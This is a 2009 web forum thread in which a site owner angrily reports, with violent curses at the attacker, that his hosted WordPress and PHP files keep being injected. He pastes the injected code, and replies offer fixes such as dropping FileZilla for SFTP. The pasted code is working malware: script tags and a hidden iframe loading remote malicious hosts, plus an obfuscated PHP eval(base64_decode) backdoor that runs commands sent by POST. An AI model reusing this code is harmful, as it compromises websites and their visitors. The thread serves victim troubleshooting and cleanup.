1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

I will kill you !!!!!!

Discussion in 'BlackHat Lounge' started by ronijs, Oct 26, 2009.

Tags:
  1. ronijs

    ronijs Registered Member

    Joined:
    Oct 29, 2007
    Messages:
    68
    Likes Received:
    70
    I know, you are somewhere here!

    How the hell you can drop these codes in my godaddy hosting account, in almost all php and html files, in wp blogs and other scripts?? I scanned my PC for viruses. I changed host/ftp all passwords and logins, but you drop these codes again and again!
    I have backdoors in firefox, filezilla or maybe windows??
    Most of my sites are Fatal error again. Hours to reload new files again.

    I dont know who you are, but hope you will die soon!!!! :AR15firin This is not blackhat U fucking hacker!!!!!


    Code:
    <script src=http://naturaldoctors.co.kr/bbs/image/vote.php ></script>
    
    <iframe frameborder="0" onload="if (!this.src){ this.src='http://testoid.ru:8080/index.php'; this.height='0'; this.width='0';}" >fdhmyitvffphvroqnxhfcrjznpfnndx</iframe>
    
    <script src=http://1interimmo.com/images/gifimg.php ></script>
    
    
    <?php eval(base64_decode('aWYoIWlzc2V0KCR3eXgxKSl7ZnVuY3Rpb24gd3l4KCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMjVoZEhWeVlXeGtiMk4wYjNKekxtTnZMbXR5TDJKaWN5OXBiV0ZuWlM5MmIzUmxMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gd3l4MigkYSwkYiwkYywkZCl7Z2xvYmFsICR3eXgxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR3eXgxKSljYWxsX3VzZXJfZnVuYygkd3l4MSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd3eXgnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnd3l4Jyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHd5eGw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3d5eDInKSkhPSd3eXgyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>
    
    
    

    Hey guys, how to stop this shit to not happen again?
     
  2. ForeverNever

    ForeverNever Power Member

    Joined:
    Sep 17, 2008
    Messages:
    727
    Likes Received:
    365
    He's probably not on this forum and that's kind of a bit too aggressive of a title don't you think?

    A lot of wp blogs are getting hacked lately
     
  3. TippiE

    TippiE Junior Member

    Joined:
    May 4, 2009
    Messages:
    123
    Likes Received:
    72
    Home Page:
    I bet they used an sql injection
     
  4. _TwaT_

    _TwaT_ Newbie

    Joined:
    Jul 8, 2009
    Messages:
    37
    Likes Received:
    8
    could be MySQL injection, or just a simple RFI exploit. Most pwnage http: sites are WP pages. Because they're the easiest to exploit and pwn. Happy hackin'! :D
     
  5. bambi

    bambi Junior Member

    Joined:
    Aug 9, 2008
    Messages:
    108
    Likes Received:
    41
    Gender:
    Female
    I had some wp blogs get hacked not too long ago. It was a virus on my computer that got through an old version of Acrobat Reader and then I was using Filezilla which they got my passwords from. It was a pain in the ASS to figure out and fix. It infected all kinds of index files and a few others.

    Now I only use SFTP (WinSCP) and never any desktop FTP programs.
     
  6. yardyblues

    yardyblues Newbie

    Joined:
    Oct 24, 2008
    Messages:
    35
    Likes Received:
    245
    Location:
    Cyber World
    even i found this code from my site
    Code:
    <script src=http://damisystem.com/gallery/index.php ></script><body id="page1"><iframe frameborder="0" onload="if (!this.src){ this.src='http://testoid.ru:8080/index.php'; this.height='0'; this.width='0';}" >gjqdzwshgwygwdbtmuweovswcxhenbd</iframe>
    
    is this a harmful malware? can any one tell me how to remove this?
     
  7. Whisker

    Whisker Moderator Staff Member Moderator Premium Member

    Joined:
    Dec 26, 2007
    Messages:
    994
    Likes Received:
    1,322
    lol, stop using filezilla.
     
  8. yardyblues

    yardyblues Newbie

    Joined:
    Oct 24, 2008
    Messages:
    35
    Likes Received:
    245
    Location:
    Cyber World
    thank you whiskerbiscuit, if not filezilla which ftp client u recommend
     
  9. Whisker

    Whisker Moderator Staff Member Moderator Premium Member

    Joined:
    Dec 26, 2007
    Messages:
    994
    Likes Received:
    1,322
    • Thanks Thanks x 2
  10. WeWatch

    WeWatch Newbie

    Joined:
    May 31, 2009
    Messages:
    2
    Likes Received:
    3
    Home Page:
    The recent outbreak of the "onload if this" website infection is detailed here in my blog post.

    http://www.wewatchyourwebsite.com/wordpress/?p=278

    The reason your site get hacked over and over again is also explained. There is remote control code on your site that allows the hackers to send new iframes or other forms of infectious code to your site and have it automatically injected into various pages on your site. It starts with stolen FTP login credentials but after that, they no longer need to use FTP, they use their remote control code instead. No log entries then.

    Post back here if you need further help.
     
    • Thanks Thanks x 1
  11. Blueprint

    Blueprint Jr. VIP Jr. VIP Premium Member

    Joined:
    Nov 10, 2009
    Messages:
    284
    Likes Received:
    117
    Location:
    Online
    If you have used Filezilla and want to switch over to winscp does Filezilla cache any of the passwords or files on the server or does it only leave it live during the session. Do I need to delete anything from the server I re secure my server?
     
  12. blackma

    blackma Power Member

    Joined:
    Jul 9, 2009
    Messages:
    795
    Likes Received:
    860
    Occupation:
    Blackhat Marketer (Full Time)
    Location:
    yendyS
    Home Page:
    I'm sorry. I won't do it again then...
     
  13. faystie

    faystie Newbie

    Joined:
    Jun 13, 2009
    Messages:
    14
    Likes Received:
    1
    Just an ot question: what's the difference between an ftp app such as filezilla and the one which is included as a feature in hosting companies? Thanks in advance! :)
    Posted via Mobile Device
     
  14. kumansk

    kumansk Regular Member

    Joined:
    Sep 14, 2008
    Messages:
    253
    Likes Received:
    420
    Uce cuteftp :)
     
  15. soctal

    soctal Regular Member

    Joined:
    Jul 28, 2008
    Messages:
    243
    Likes Received:
    76
  16. LV John

    LV John Registered Member

    Joined:
    May 15, 2007
    Messages:
    52
    Likes Received:
    204
    Occupation:
    head janitor
    Location:
    lost wages
    I second that!

    I had a bunch of Wp sites hacked earlier this year and FileZilla was the only common thead between them.

    I've been usng WinSCP since and not a problem.

    Get it here:

    Code:
    http://winscp.net/eng/index.php
    Cheers